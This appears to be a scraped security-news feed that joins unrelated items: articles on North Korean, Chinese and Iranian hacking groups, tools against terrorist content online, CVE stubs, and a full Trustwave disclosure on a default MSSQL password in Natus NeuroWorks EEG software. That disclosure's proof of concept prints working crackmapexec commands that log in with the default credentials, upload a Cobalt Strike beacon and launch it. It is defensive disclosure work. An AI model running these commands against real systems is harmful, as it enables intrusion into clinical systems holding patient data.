A sub-cluster within the infamous Lazarus Group has established new infrastructure that impersonates skills assessment portals as part of its social engineering campaigns.
Microsoft attributed the activity to a threat actor it calls Sapphire Sleet, describing it as a "shift in the persistent actor's tactics."
Sapphire Sleet, also called APT38, BlueNoroff, CageyChameleon, and CryptoCore, has a

Threat Intelligence / Cybercrime

A sub-cluster within the infamous Lazarus Group has established new infrastructure that impersonates skills assessment portals as part of its social engineering campaigns.

Microsoft attributed the activity to a threat actor it calls **Sapphire Sleet**, describing it as a "shift in the persistent actor's tactics."

Sapphire Sleet, also called APT38, BlueNoroff, CageyChameleon, and CryptoCore, has a track record of orchestrating cryptocurrency theft via social engineering.

Earlier this week, Jamf Threat Labs implicated the threat actor to a new macOS malware family called ObjCShellz that's assessed to be a late-stage payload delivered in connection with another macOS malware known as RustBucket.

"Sapphire Sleet typically finds targets on platforms like LinkedIn and uses lures related to skills assessment," the Microsoft Threat Intelligence team said in a series of posts on X (formerly Twitter).

"The threat actor then moves successful communications with targets to other platforms."

The tech giant said past campaigns mounted by the hacking crew involved sending malicious attachments directly or embedding links to pages hosted on legitimate websites like GitHub.

However, the swift detection and deletion of these payloads may have forced Sapphire Sleet to flesh out its own network of websites for malware distribution.

"Several malicious domains and subdomains host these websites, which entice recruiters to register for an account," the company added. "The websites are password-protected to impede analysis."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of Fake Skills Assessment Portals Targeting IT Job Seekers

US government officials continue to warn that the public and private sectors need to identify and root out China-backed attackers lurking in industrial control systems.

The United States National Security Agency is often tight-lipped about its work and intelligence. But at the Cyberwarcon security conference in Washington DC on Thursday, two members of the agency’s Cybersecurity Collaboration Center had a “call to action” for the cybersecurity community: Beware the threat of Chinese government-backed hackers embedding in US critical infrastructure.

Alongside its “Five Eyes” intelligence alliance counterparts, the NSA has been warning since May that a Beijing-sponsored group known as Volt Typhoon has been targeting critical infrastructure networks, including power grids, as part of its activity.

Officials emphasized on Thursday that network administrators and security teams need to be on the lookout for suspicious activity in which hackers manipulate and misuse legitimate tools rather than malware—an approach known as “living off the land”—to carry out clandestine operations. They added that the Chinese government also develops novel intrusion techniques and malware, thanks to a substantial stockpile of zero-day vulnerabilities that hackers can weaponize and exploit. Beijing collects these bugs through its own research, as well as a law that requires vulnerability disclosure.

The People’s Republic of China “works to gain unauthorized access to systems and wait for the best time to exploit these networks,” Morgan Adamski, director of the NSA’s Cybersecurity Collaboration Center, said on Thursday. “The threat is extremely sophisticated and pervasive. It is not easy to find. It is pre-positioning with intent to quietly burrow into critical networks for the long haul. The fact that these actors are in critical infrastructure is unacceptable, and it is something that we are taking very seriously—something that we are concerned about.”

Microsoft’s Mark Parsons and Judy Ng gave an update on Volt Typhoon’s activity later in the day at Cyberwarcon. They noted that after seemingly becoming dormant in the spring and most of the summer, the group reappeared in August with improved operational security to make its activity more difficult to track. Volt Typhoon has continued attacking universities and US Army Reserve Officers’ Training Corps programs—a type of victim the group particularly favors—but it has also been observed targeting additional US utility companies.

“We think Volt Typhoon is doing this for espionage-related activity, but in addition, we think there’s an element that they could use it for destruction or disruption in a time of need,” Microsoft’s Ng said on Thursday.

The NSA’s Adamski and Josh Zaritsky, chief operations officer of the Cybersecurity Collaboration Center, urged network defenders to manage and audit their system logs for anomalous activity and store logs such that they can’t be deleted by an attacker who gains system access and is looking to hide their tracks.

The two also emphasized best practices, like two-factor authentication and limiting users’ and admins’ system privileges to minimize the possibility that attackers can compromise and exploit accounts in the first place. And they emphasized that not only is it necessary to patch software vulnerabilities, it is crucial to then go back and check logs and records to make sure that there aren’t signs that the bug was exploited before it was patched.

“We are going to need internet service providers, cloud providers, endpoint companies, cybersecurity companies, device manufacturers, everybody in this fight together. And this is a fight for our US critical infrastructure,” Adamski said. “The products, the services that we rely on, everything that matters—that’s why this is important.”

The NSA Seems Pretty Stressed About the Threat of Chinese Hackers in US Critical Infrastructure

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

CVE-2023-36027

Small platforms without resources to handle takedown requests have been weaponized by terrorist groups that share their content online. A free new tool is coming to help clean house.

Terrorist groups have found a home on smaller, less well-known online platforms in recent years where they store, share, and link to content such as violent beheading videos and recruitment propaganda.

Those platforms have struggled to deal with the problem due to a lack of resources and expertise, but a new tool being built by a Google subsidiary in collaboration with a terror-tracking NGO is seeking to solve that problem.

Launched in Paris on Friday, Altitude is a free tool built by Jigsaw—a unit within Google that tracks violent extremism, misinformation, and repressive censorship—and Tech Against Terrorism, a group that seeks to disrupt terrorists’ online activity. The tool aims to give smaller platforms the ability to easily and efficiently detect terrorist content on their networks and remove it.

The project is also working with the Global Internet Forum to Counter Terrorism, which is an industry-led group founded in 2017 by Facebook, Microsoft, Twitter, and YouTube that hosts a shared database of image hashes—a kind of digital fingerprint—of terrorist content.

After years of missteps and failing to deal with the problem of removing terrorist content from their networks, big tech platforms like Facebook, Google, and X (formerly Twitter) have—with the help of dedicated NGOs and law enforcement—largely removed this content from their networks, with the notable exception of Telegram. As a result, terrorists have moved to less regulated and under-resourced platforms where their presence either goes unnoticed or cannot be dealt with because the companies involved simply don’t have the resources to cope with a flood of takedown requests.

“Islamic State and other terrorist groups didn't give up on the internet just because they no longer had the megaphone of their social media platforms. They went elsewhere,” Yasmin Green, the CEO of Jigsaw, tells WIRED. “They found this opportunity to host content on file-hosting sites or other websites, small and medium platforms. Those platforms were not welcoming terrorist content, but they still were hosting it—and actually, quite a lot of it.”

While there are some tools on the market that work in a similar way to Altitude, they are prohibitively expensive for a lot of smaller companies. Experts like Green believe that tools like this need to be open source and free of charge.

The new tool can be integrated straight into the backend of whatever platform it is working with. It then connects to Tech Against Terrorism’s own Terrorist Content Analytics Platform, which centralizes the collection of content that has been created by officially designated terrorist organizations. The database allows all the platforms using Altitude to easily check whether a piece of content has been verified as terrorist content.

Altitude will also provide context about the terrorist groups the content is associated with, other examples of this type of material, information on what other platforms have done with the material, and, eventually, even information pertaining to the relevant laws in a particular country or region.

“We are not here to tell platforms what to do but rather to furnish them with all the information that they need to make the moderation decision," Adam Hadley, executive director of Tech Against Terrorism, tells WIRED. “We want to improve the quality of response. This isn’t about the volume of material removed but ensuring that the very worst material is removed in a way that is supporting the rule of law.”

Tech Against Terrorism works with more than 100 platforms, almost all of which don’t want to be named because of the negative impact on their business of being linked to terrorist content. The type of companies that Tech Against Terrorism works with include pastebins, messaging apps, video-sharing platforms, social media networks, and forums.

For many of these smaller platforms, dealing with takedown requests from governments, civil society organizations, law enforcement, and the platform's own users can be overwhelming and result in companies going to one extreme or the other.

“Platforms can become easily overwhelmed by the takedown requests, and they either ignore them all or they take everything down,” Hadley says. “What we're looking for is to try to create an environment where platforms have the tools to be able to properly assess whether they should remove material or not, because it's imperative to take down terror content, but it's also really important that they're not just removing any content because of concerns about freedom of expression.”

The Israel-Hamas war has shown what an important role Telegram continues to play in allowing terrorist groups to spread their messages. While efforts to hold Telegram to account have had limited success in recent weeks, terror content remains accessible, and it is from here that the content is quickly shared on a multitude of other platforms. And this is where the Altitude tool can make a difference, according to Hadley.

“Ideally, the content wouldn’t be put up on Telegram in the first place,” Hadley says. “But given that it is, the next best thing we can do is make sure that other platforms that are being co-opted into this by terrorists are aware of this activity and have the right information to take down the material in an appropriate fashion.”

This New Tool Aims to Keep Terrorism Content Off the Internet

An elevation of privilege vulnerability exists in Microsoft browsers allowing sandbox escape. An attacker who successfully exploited the vulnerability could use the sandbox escape to elevate privileges on an affected system.

This vulnerability by itself does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability (such as a remote code execution vulnerability or another elevation of privilege vulnerability) that is capable of leveraging the elevated privileges when code execution is attempted.

CVE-2023-36027: Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

Natus NeuroWorks and SleepWorks before 8.4 GMA3 utilize a default password of xltek for the Microsoft SQL Server service sa account, allowing a threat actor to perform remote code execution, data exfiltration, or other nefarious actions such as tampering with data or destroying/disrupting MSSQL services.

Trustwave SpiderLabs Security Advisory TWSL2023-006: Default MSSQL Database Password in Natus NeuroWorks EEG Software Published: 11/07/2023 Version: 1.0 Vendor: Natus https://natus.com/products-services/natus-neuroworks-eeg-software Product: NeuroWorks EEG Software Version affected: Prior to 8.4 GMA3 Product description: The Natus NeuroWorks platform simplifies the process of collecting, monitoring, trending and managing data for routine EEG testing, ambulatory EEG, long-term monitoring, ICU monitoring, and research studies. NeuroWorks systems are scalable to meet the needs of private practice clinics, hospitals, large teaching facilities and EEG service providers. Natus NeuroWorks is a cutting-edge, single solution for EEG, LTM, ICU, Sleep, and Research Studies, exhibiting an advanced software for clinical excellence. The Microsoft SQL-based NeuroWorks database is a powerful tool that simplifies the management of patient, study and laboratory data. Filter studies by date, status, diagnosis, or use any built-in editable field to create custom filters for your unique needs. Track outcomes and filter by statistical indices that are calculated in the reports. The distributed database automatically updates system settings across the network to ensure that all workstations have current lab settings. Finding 1: Default Password for Natus NeuroWorks EEG Software MSSQL Database \*\*\*\*\*Credit: John Jackson of Trustwave Natus NeuroWorks EEG Software utilizes their own custom MSSQL configuration and database for the management of medical research studies connected to the testing and monitoring software implemented via the Natus NeuroWorks platform. By default, the MSSQL service utilizes the administrative username 'sa' coupled with the password 'xltek'. An attacker can utilize the default credentials to access stored sensitive data or perform administrative functions and MSSQL queries. In addition, an attacker on the local network could potentionally leverage the credentials to access the file system of the server and perform read, write, and execution functions on the disk. Natus recommends against changing the default password as it will disable MigrateDB's ability to authenticate silently in instances of new virtual database creation. Proof of Concept/Summary: While the instance of default credentials is properly documented within the "XL Security Site Administrator Reference" guide, Natus specifically recommends against changing the default credentials. The document specifically states: "Each instance of SQL Server also has a system administrator username ('sa'). The default password is 'xltek'; however it can be changed for each instance of SQL Server. We strongly recommend using the default password for local SQL Server instances". Natus recommends against changing the password, because of their MigrateDB function. The document goes on to say: "MigrateDB is also called silently when a new 'virtual database' is created through Natus Database - XLDB. In this case, MigrateDB will not prompt the user for the 'sa' password. If the password for 'sa' has been altered on the local machine from its default, the creation of a new virtual server will fail". They do however recommend a workaround, which is to change the password back to xltek while performing new virtual database creation, and then once again change back to the default. ## Running the command 'whoami' using default credentials └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'whoami' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME nt authority\\network service ## Writing a cobalt strike beacon to a local windows directory └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth --put-file /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe C:\\\\Temp\\\\Events\\\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Copy /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe to C:\\Temp\\Events\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Size is 409088 bytes MSSQL SERVERNAME 1433 SERVERNAME \[+\] File has been uploaded on the remote machine └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'dir C:\\Temp\\Events\\' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME Volume in drive C is Windows MSSQL SERVERNAME 1433 SERVERNAME Volume Serial Number is A050-B8DA MSSQL SERVERNAME 1433 SERVERNAME Directory of C:\\Temp\\Events MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

. MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

.. MSSQL SERVERNAME 1433 SERVERNAME 06/23/2023 02:31 PM 409,088 armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME 1 File(s) 409,088 bytes MSSQL SERVERNAME 1433 SERVERNAME 2 Dir(s) 34,903,302,144 bytes free ## Triggering the cobalt strike beacon └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'cmd.exe /c start C:\\Temp\\Events\\armsvc.exe' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME None ## Beacon command execution proof beacon> sleep 0 \[\*\] Tasked beacon to become interactive \[+\] host called home, sent: 16 bytes beacon> getuid \[\*\] Tasked beacon to get userid \[+\] host called home, sent: 8 bytes \[\*\] You are NT AUTHORITY\\NETWORK SERVICE beacon> run systeminfo \[\*\] Tasked beacon to run: systeminfo \[+\] host called home, sent: 28 bytes \[+\] received output: Host Name: SERVERNAME OS Name: Microsoft Windows 10 Enterprise 2016 LTSB OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: XXXXX-XXXXX-XXXXX-XXXXX Original Install Date: 6/6/2017, 5:39:30 PM System Boot Time: 6/17/2023, 2:07:18 PM System Manufacturer: Dell Inc. System Model: OptiPlex 5050 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. \[01\]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3312 Mhz BIOS Version: Dell Inc. 1.11.1, 11/29/2018 Windows Directory: C:\\windows System Directory: C:\\windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 8,051 MB Available Physical Memory: 5,344 MB Virtual Memory: Max Size: 16,243 MB Virtual Memory: Available: 13,210 MB Virtual Memory: In Use: 3,033 MB Page File Location(s): C:\\pagefile.sys Domain: REDACTED FOR PRIVACY Logon Server: N/A Hotfix(s): 6 Hotfix(s) Installed. \[01\]: KB4013418 \[02\]: KB4033631 \[03\]: KB4049411 \[04\]: KB4103729 \[05\]: KB4132216 \[06\]: KB4103720 Network Card(s): 1 NIC(s) Installed. \[01\]: Intel(R) Ethernet Connection (5) I219-V Connection Name: LAN DHCP Enabled: Yes DHCP Server: X.X.X.X IP address(es) \[01\]: X.X.X.X Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: Yes Second Level Address Translation: Yes Data Execution Prevention Available: Yes Vendor Response: The vendor has revised the Administrator Reference document by discontinuing the endorsement of default password usage. Instead, the vendor strongly recommends that all users change default SQL credentials. This requires to update the software to leverage the Credentials Cache feature, introduced in version 8.4 GMA3. The technical service team will provide the revised documentation to customers on request, and in the future, it will be integrated into the Neuroworks software installation package. The vendor has additionally released a security advisory regarding this threat. You can access the security bulletin at this link: https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf Remediation Steps: Upgrade to GMA3 version 8.4 or a higher version to enable the credential cache feature and update the default SQL credentials. Revision History: 06/27/2023 - Trustwave disclosed vulnerability to vendor 07/07/2023 - Vendor provides Trustwave with preliminary version of the updated documentation 07/18/2023 - Vendor has provided Trustwave with remediation plan 10/20/2023 - Vendor publishes security bulletin 11/07/2023 - Advisory published References 1. https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

CVE-2023-47800

A group with links to Iran targeted transportation, logistics, and technology sectors in the Middle East, including Israel, in October 2023 amid a surge in Iranian cyber activity since the onset of the Israel-Hamas war.
The attacks have been attributed by CrowdStrike to a threat actor it tracks under the name Imperial Kitten, and which is also known as Crimson Sandstorm (previously Curium),

Cyber Attack / Cyber Threat

A group with links to Iran targeted transportation, logistics, and technology sectors in the Middle East, including Israel, in October 2023 amid a surge in Iranian cyber activity since the onset of the Israel-Hamas war.

The attacks have been attributed by CrowdStrike to a threat actor it tracks under the name **Imperial Kitten**, and which is also known as Crimson Sandstorm (previously Curium), TA456, Tortoiseshell, and Yellow Liderc.

The latest findings from the company build on prior reports from Mandiant, ClearSky, and PwC, the latter of which also detailed instances of strategic web compromises (aka watering hole attacks) leading to the deployment of IMAPLoader on infected systems.

"The adversary, active since at least 2017, likely fulfills Iranian strategic intelligence requirements associated with IRGC operations," CrowdStrike said in a technical report. "Its activity is characterized by its use of social engineering, particularly job recruitment-themed content, to deliver custom .NET-based implants."

Attack chains leverage compromised websites, primarily those related to Israel, to profile visitors using bespoke JavaScript and exfiltrate the information to attacker-controlled domains.

Besides watering hole attacks, there's evidence to suggest that Imperial Kitten resorts to exploitation of one-day exploits, stolen credentials, phishing, and even targeting upstream IT service providers for initial access.

Phishing campaigns involve the use of macro-laced Microsoft Excel documents to activate the infection chain and drop a Python-based reverse shell that connects to a hard-coded IP address for receiving further commands.

Among some of the notable post-exploitation activities entail achieving lateral movement through the use of PAExec, the open-source variant of PsExec, and NetScan, followed by the delivery of the implants IMAPLoader and StandardKeyboard.

Also deployed is a remote access trojan (RAT) that uses Discord for command-and-control, while both IMAPLoader and StandardKeyboard employ email messages (i.e., attachments and email body) to receive tasking and send results of the execution.

"StandardKeyboard's main purpose is to execute Base64-encoded commands received in the email body," the cybersecurity company pointed out. "Unlike IMAPLoader, this malware persists on the infected machine as a Windows Service named Keyboard Service."

The development comes as Microsoft noted that malicious cyber activity attributed to Iranian groups after the start of the war on October 7, 2023, is more reactive and opportunistic.

"Iranian operators \[are\] continuing to employ their tried-and-true tactics, notably exaggerating the success of their computer network attacks and amplifying those claims and activities via a well-integrated deployment of information operations," Microsoft said.

"This is essentially creating online propaganda seeking to inflate the notoriety and impact of opportunistic attacks, in an effort to increase their effects."

The disclosure also follows revelations that a Hamas-affiliated threat actor named Arid Viper has targeted Arabic speakers with an Android spyware known as SpyC23 through weaponized apps masquerading as Skipped and Telegram, according to Cisco Talos and SentinelOne.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Iran-Linked Imperial Kitten Cyber Group Targeting Middle East's Tech Sectors

CVE-2023-36024

Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability

CVE-2023-36014

Experts are finding thousands of examples of AI-created content every week that could allow terrorist groups and other violent extremists to bypass automated detection systems.

Extremist groups have begun to experiment with artificial intelligence, and in particular generative AI, in order to create a flood of new propaganda. Experts now fear the growing use of generative AI tools by these groups will overturn the work Big Tech has done in recent years to keep their content off the internet.

“Our biggest concern is that if terrorists start using gen AI to manipulate imagery at scale, this could well destroy hash-sharing as a solution,” Adam Hadley, the executive director of Tech Against Terrorism, tells WIRED. “This is a massive risk.”

For years, Big Tech platforms have worked hard to create databases of known violent extremist content, known as hashing databases, which are shared across platforms to quickly and automatically remove such content from the internet. But according to Hadley, his colleagues are now picking up around 5,000 examples of AI-generated content each week. This includes images shared in recent weeks by groups linked to Hezbollah and Hamas that appear designed to influence the narrative around the Israel-Hamas war.

“Give it six months or so, the possibility that \[they\] are manipulating imagery to break hashing is really concerning,” Hadley says. “The tech sector has done so well to build automated technology, terrorists could well start using gen AI to evade what's already been done.”

Other examples that researchers at Tech Against Terrorism have uncovered in recent months have included a neo-Nazi messaging channel sharing AI-generated imagery created using racist and antisemitic prompts pasted into an app available on the Google Play store; far-right figures producing a “guide to memetic warfare” advising others on how to use AI-generated image tools to create extremist memes; the Islamic State publishing a tech support guide on how to securely use generative AI tools; a pro-IS user of an archiving service claiming to have used an AI-based automatic speech recognition (ASR) system to transcribe Arabic language IS propaganda; and a pro-al-Qaeda outlet publishing several posters with images highly likely to have been created using a generative AI platform.

Beyond detailing the threat posed by generative AI tools that can tweak images, Tech Against Terrorism has published a new report citing other ways in which gen AI tools can be used to help extremist groups. These include the use of autotranslation tools that can quickly and easily convert propaganda into multiple languages, or the ability to create personalized messages at scale to facilitate recruitment efforts online. But Hadley believes that AI also provides an opportunity to get ahead of extremist groups and use the technology to preempt what they will use it for.

“We're going to partner with Microsoft to figure out if there are ways using our archive of material to create a sort of gen AI detection system in order to counter the emerging threat that gen AI will be used for terrorist content at scale,” Hadley says. “We're confident that gen AI can be used to defend against hostile uses of gen AI.”

The partnership was announced today, on the eve of the Christchurch Call Leaders’ Summit, a movement designed to eradicate terrorism and extremist content from the internet, to be held in Paris.

“The use of digital platforms to spread violent extremist content is an urgent issue with real-world consequences,” Brad Smith, vice chair and president at Microsoft said in a statement. “By combining Tech Against Terrorism’s capabilities with AI, we hope to help create a safer world both online and off.”

While companies like Microsoft, Google, and Facebook all have their own AI research divisions and are likely already deploying their own resources to combat this issue, the new initiative will ultimately aid those companies that can’t combat these efforts on their own.

“This will be particularly important for smaller platforms that don't have their own AI research centers,” Hadley says. “Even now, with the hashing databases, smaller platforms can just become overwhelmed by this content.”

The threat of AI generative content is not limited to extremist groups. Last month, the Internet Watch Foundation, a UK-based nonprofit that works to eradicate child exploitation content from the internet, published a report that detailed the growing presence of child sexual abuse material (CSAM) created by AI tools on the dark web.

The researchers found over 20,000 AI-generated images posted to one dark web CSAM forum over the course of just one month, with 11,108 of these images judged most likely to be criminal by the IWF researchers. As the IWF researchers wrote in their report, “These AI images can be so convincing that they are indistinguishable from real images.”

Tag

#microsoft